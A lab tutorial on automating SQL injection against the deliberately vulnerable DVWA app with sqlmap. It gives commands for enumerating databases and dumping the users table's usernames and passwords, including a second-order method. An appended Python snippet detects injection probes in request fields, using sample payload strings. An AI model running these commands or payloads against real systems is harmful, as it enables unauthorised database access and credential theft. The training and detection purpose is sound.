Sample analysis of Sqlmap automated injection
Use sqlmap to automate SQL injection testing of DVWA
1. Set the DVWA security level to low.
2. Open the SQL Injection page of DVWA (SQL Injection (Blind)), open the browser's developer tools, enter a user ID, submit it, and view the captured request.
3. You can see that it is a GET request with the URL "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
4. Pass the URL directly to sqlmap for testing, using the -u option: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"
5. The output shows that a login is required; otherwise the scan will not return results. So we need to add a cookie to keep the session logged in.
6. Use the Burp Suite proxy to capture the request, obtain the login cookie, and add --dbs to enumerate the databases: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs
You can see that the database found is mysql.
7. Use -D xxx to specify the database to inspect, and --tables to list all tables in that database: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables
View the running results:
8. Use -D xxx -T ttt to specify the table to inspect, and --columns to list the columns of that table:
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns
9. Use -D xxx to specify the database, -T xxx to specify the table, -C xxx to specify the columns, and --dump to view the column data:
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump
Adjust the DVWA security level to medium. Save the captured request as a .txt file, put it in the sqlmap directory, and run it directly with -r <file name> --dbs (you can add the subsequent parameters yourself).
Adjust the DVWA security level to high. Because the page that submits the data this time is not the same page as the one that returns the results, the previous method cannot be used here. Use the second-order injection method instead.
The URL to submit data
Returned URL
Save the captured request as a .txt file, put it in the sqlmap directory, and then enumerate the databases with the command: -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 --dbs
Enumerate the tables:
-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa --tables
Enumerate the columns:
-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users --columns
Dump the field data:
-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users -C user,password --dump
Some conceptual notes:
Second-order injection: second-order
level: sqlmap has 5 detection levels; the default is 1. The higher the level, the more payloads are used during detection. Level 5 uses the most payloads and also automatically tests headers such as Cookie and XFF for injection. The higher the level, the slower the detection. This parameter also affects which injection points are tested: GET and POST data are always tested, HTTP cookies are tested when level is 2, and the HTTP User-Agent/Referer headers are tested when level is 3. When you are not sure which parameter is the injection point, it is recommended to set level to 5 to ensure accuracy (the speed will also become slower).
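The level behaviour described above also tells a defender which request fields to inspect, since a filter that only looks at the query string misses probes sent in cookies or headers. The following Python example is added here and is not part of the original article or of sqlmap: it checks each request field for common injection probe shapes and reports the minimum level that reaches that field. The pattern list, field names and sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumed, deliberately small set of probe shapes: quote + boolean operator,
# UNION ... SELECT, time-delay functions, numeric tautology, trailing comment.
PROBE = re.compile(
    r"['\"]\s*(or|and)\b|\bunion\b.+\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|"
    r"\b(and|or)\s+\d+\s*=\s*\d+|--\s",
    re.IGNORECASE,
)

# Request fields and the minimum level at which the article says they are tested.
LOCATIONS = {"query": 1, "body": 1, "cookie": 2, "user_agent": 3, "referer": 3}

def probed_locations(request):
    """Return {field: min_level} for every field that contains a probe shape."""
    hits = {}
    for field, level in LOCATIONS.items():
        value = unquote_plus(request.get(field, ""))  # decode %27, '+', etc.
        if PROBE.search(value):
            hits[field] = level
    return hits

def implied_level(requests):
    """Highest minimum level implied by any probed field (0 = nothing flagged)."""
    return max((lvl for r in requests for lvl in probed_locations(r).values()),
               default=0)

# Constructed sample requests (not captured traffic).
SAMPLES = [
    {"query": "id=1&Submit=Submit", "cookie": "PHPSESSID=abc; security=low",
     "user_agent": "Mozilla/5.0"},
    {"query": "id=1%27+AND+4821%3D4821--+&Submit=Submit",
     "cookie": "PHPSESSID=abc; security=low", "user_agent": "Mozilla/5.0"},
    {"query": "id=1&Submit=Submit",
     "cookie": "PHPSESSID=abc; security=low' AND SLEEP(5)-- x",
     "user_agent": "Mozilla/5.0"},
    {"query": "id=1&Submit=Submit", "cookie": "PHPSESSID=abc; security=low",
     "user_agent": "Mozilla/5.0' UNION ALL SELECT NULL-- x"},
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLES):
        print(i, probed_locations(req))
    print("highest level implied:", implied_level(SAMPLES))
```

Pattern matching of this kind is a log triage aid only; the fix for the injectable id parameter is a parameterized query on the server side.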